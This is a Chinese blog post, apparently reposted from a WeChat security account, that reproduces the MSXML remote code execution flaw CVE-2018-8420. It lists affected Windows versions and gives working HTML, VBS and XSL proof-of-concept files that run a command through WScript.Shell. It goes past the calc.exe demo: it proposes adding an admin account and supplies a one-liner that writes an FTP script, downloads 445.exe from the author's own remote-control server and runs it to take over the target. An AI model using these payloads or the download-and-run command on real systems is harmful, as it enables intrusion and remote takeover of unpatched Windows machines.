CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)

  • A+
所属分类:安全文章

首先在这里特此感谢一下倾旋大宝贝提供的poc代码!!!




先发一下影响版本吧:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems

  • Microsoft Windows 10 Version 1607 for x64-based Systems

  • Microsoft Windows 10 Version 1803 for 32-bit Systems

  • Microsoft Windows 10 Version 1803 for x64-based Systems

  • Microsoft Windows 10 for 32-bit Systems

  • Microsoft Windows 10 for x64-based Systems

  • Microsoft Windows 10 version 1703 for 32-bit Systems

  • Microsoft Windows 10 version 1703 for x64-based Systems

  • Microsoft Windows 10 version 1709 for 32-bit Systems

  • Microsoft Windows 10 version 1709 for x64-based Systems

  • Microsoft Windows 7 for 32-bit Systems SP1

  • Microsoft Windows 7 for x64-based Systems SP1

  • Microsoft Windows 8.1 for 32-bit Systems

  • Microsoft Windows 8.1 for 64-bit Systems

  • Microsoft Windows RT 8.1

  • Microsoft Windows Server 1709

  • Microsoft Windows Server 1803

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1

  • Microsoft Windows Server 2008 for 32-bit Systems SP2

  • Microsoft Windows Server 2008 for Itanium-based Systems SP2

  • Microsoft Windows Server 2008 for x64-based Systems SP2

  • Microsoft Windows Server 2012

  • Microsoft Windows Server 2012 R2

  • Microsoft Windows Server 2016


poc:

POC地址:https://github.com/Lz1y/CVE-2018-8420



//xml.html

<!--from 倾旋-->

<script type="text/vbscript">

Sub POC()

Set XML = CreateObject("Microsoft.XMLDOM")

XML.async = False

Set xsl = XML

xsl.Load "xml.xml"

XML.transformNode xsl

End Sub

POC()

</script>


//xml.vbs

Sub Dummy()

Set XML = CreateObject("Microsoft.XMLDOM")

XML.async = False

Set xsl = XML

xsl.Load "xml.xml"

XML.transformNode xsl

End Sub

Dummy()



//xml.xml

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

 <ms:script implements-prefix="user" language="JScript">

 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

 ]]> </ms:script>

</stylesheet>



以上是上述的三个代码


只需要执行xml.html或者xml.vbs就可以触发该漏洞


CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)



以上是目前为止的复现的过程









当然如果只是这样,是不是有点太鸡肋了。然后随即我突发奇想!!!


来我们看xml.xml的第九行代码

CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)


 var r = new ActiveXObject("WScript.Shell").Run("calc.exe");


calc.exe是打开记事本,那我们如果执行net user admin admin /add之类的提权的命令呢?


当然一般来说直接执行net user都会被windows防火墙拦截的,我们接着这个思路往下想。如何不被拦截,并且直接能获取到对方的权限呢?


嘻嘻,那我就发一波珍藏的代码。

cmd /c @echo open 127.0.0.1>>Ex.dat&@echo 123>>Ex.dat&@echo 33444545>>Ex.dat&echo bin>>Ex.dat&@echo get 445.exe>>Ex.dat&@echo bye>>Ex.dat&@echo 445.exe>>Ex.dat&@ftp -s:Ex.dat&del Ex.dat&csrss.exe&445.exe


127.0.0.1是自己的远控服务器,在自己的远控服务器中配置hfs就可以配合这个代码进行远控了。

//为了避免被喝茶,图就不放了。








作者:ian

转载时请通过公众号后台联系小编

侵权必究!!!






本文始发于微信公众号(零组攻防实验室):CVE-2018-8420(Msxml 解析器的远程代码执行漏洞复现)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: